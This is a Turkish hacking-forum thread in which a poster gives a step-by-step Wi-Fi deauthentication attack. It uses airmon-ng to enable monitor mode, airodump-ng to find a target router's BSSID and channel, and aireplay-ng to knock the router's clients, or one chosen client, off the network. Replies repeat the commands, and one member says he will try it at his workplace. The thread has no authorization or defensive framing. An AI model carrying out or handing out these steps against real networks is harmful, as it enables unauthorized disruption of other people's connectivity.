Deauth Attack Nasıl yapılır? [ANLATIM]

Suppressor

Request Uzmanı
16 Kas 2022
1,205
713
always, everywhere
Selamlar Bu Gün Deauth (deauthenticatin Attack Nasıl yapılır onu Anlatacağım.

Deauth Attack Nedir: Herhangi bir kablosuz ağda bağlı bulunan cihazları ağdan bağlantısını kesmeye yarayan bir saldırı çeşididir. Bu saldırıyı yapabilmek için hedef ağın MAC adresini bilmek gereklidir. İster hedeflediği kullanıcıyı isterse ağda bulunan tüm kullanıcıları ağdan koparabilir.

Ama ondan Önce bu saldırı gerçekleştirebilmemiz için 1 Adet Monitör Mod destekleyen usb Wifi karta ihtiyacımız var.
Benim kullandımğımm usb wifi kart

cqq0dxv.png
Takıyoruz ve Kali den seçiyoruz.

airmon-ng start wlan0
tsyam0h.png

Ardından airodump-ng wlan0mon

t1tza4s.png

Şimdi Seçtiğimiz ağ üzerinden detaylı bilgi almak için airodump-ng --channel 1 --bssid 5C:63:BF:00:D9:F2 ( Siz seçtiğiniz hedefin Channel ve Mac adresini gireceksiniz )

n2ymq3i.png

Burada Modeme Saldırmak istiyorsak aireplay-ng --deauth (paket sayısı ) -a (Modem Mac Adresi ) wlan0mon
289s6d5.png

Modema Bağlanan birine saldırmak istiyorsak aireplay-ng --deauth -a ( Modem Mac Adresi ) -c ( Modeme Bağlanan Kişinin Mac Adresi )
jr63ijx.png

Başarılı
321f9ih.png

Son düzenleme:

Berceste.

Uzman üye
21 Tem 2020
1,029
958
Eline emeğine sağlık, bu işlere merakı olan arkadaşlar için bilgilendirici olmuş.

Muslukcu

Katılımcı Üye
17 Kas 2021
699
262
Tesisat dükkanı

Deauth Attack Nedir: Herhangi bir kablosuz ağda bağlı bulunan cihazları ağdan bağlantısını kesmeye yarayan bir saldırı çeşididir. Bu saldırıyı yapabilmek için hedef ağın MAC adresini bilmek gereklidir. İster hedeflediği kullanıcıyı isterse ağda bulunan tüm kullanıcıları ağdan koparabilir.

Ama ondan Önce bu saldırı gerçekleştirebilmemiz için 1 Adet Monitör Mod destekleyen usb Wifi karta ihtiyacımız var.

cqq0dxv.png

airmon-ng start wlan0
tsyam0h.png

t1tza4s.png

Şimdi Seçtiğimiz ağ üzerinden detaylı bilgi almak için airodump-ng --channel 1 --bssid 5C:63:BF:00:D9:F2 ( Siz seçtiğiniz hedefin Channel ve Mac adresini gireceksiniz )

n2ymq3i.png

Burada Modeme Saldırmak istiyorsak aireplay-ng --deauth (paket sayısı ) -a (Modem Mac Adresi ) wlan0mon
289s6d5.png

Modema Bağlanan birine saldırmak istiyorsak aireplay-ng --deauth -a ( Modem Mac Adresi ) -c ( Modeme Bağlanan Kişinin Mac Adresi )
jr63ijx.png

Başarılı
321f9ih.png
Elinize sağlık

mahmoudife

Üye
16 Ara 2022
133
51
World

cqq0dxv.png

airmon-ng start wlan0
tsyam0h.png

t1tza4s.png

n2ymq3i.png

289s6d5.png

jr63ijx.png

Başarılı
321f9ih.png
çok faydalı bir atack gerçekten elinize sağlık <3

Yeni Kullanıcıyım Ben

Katılımcı Üye
11 Ara 2022
795
301
Matrix
Arkadaşlar benim bu konuda biraz kafam karışmıştı.Hani modemin içine girdikten sonra o modeme bağlı cihazlar var.İşte o cihazların üst kısmında station diye bi bölüm var o cihazın mac adresimi oluyor?

Suppressor

Request Uzmanı
16 Kas 2022
1,205
713
always, everywhere
Arkadaşlar benim bu konuda biraz kafam karışmıştı.Hani modemin içine girdikten sonra o modeme bağlı cihazlar var.İşte o cihazların üst kısmında station diye bi bölüm var o cihazın mac adresimi oluyor?
bssid Yazan kısım Modemin Mac adresi.
Statıon Yazan kısım modema bağlanan kullanıcıların mac adresi.

Örnek A Modemine airodump-ng --(MODEM KANALI) --bssid ( MODEM MAC ADRESİ ) ile girdik

Statıon yazan yerde A B C Çıktı bunu o internete bağlanan kişinin mac adresi olarak düşün

Güzel anlatım bi ara işyerinde denicem 😅
Teşekkürler sağ ol.
güzel konu olmuş hocam kullanılır sağolun
Teşekkürler sağ ol.

AwiR

Katılımcı Üye
4 Ocak 2020
503
211

cqq0dxv.png

airmon-ng start wlan0
tsyam0h.png

t1tza4s.png

n2ymq3i.png

289s6d5.png

jr63ijx.png

Başarılı
321f9ih.png
Eline sağlık.

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.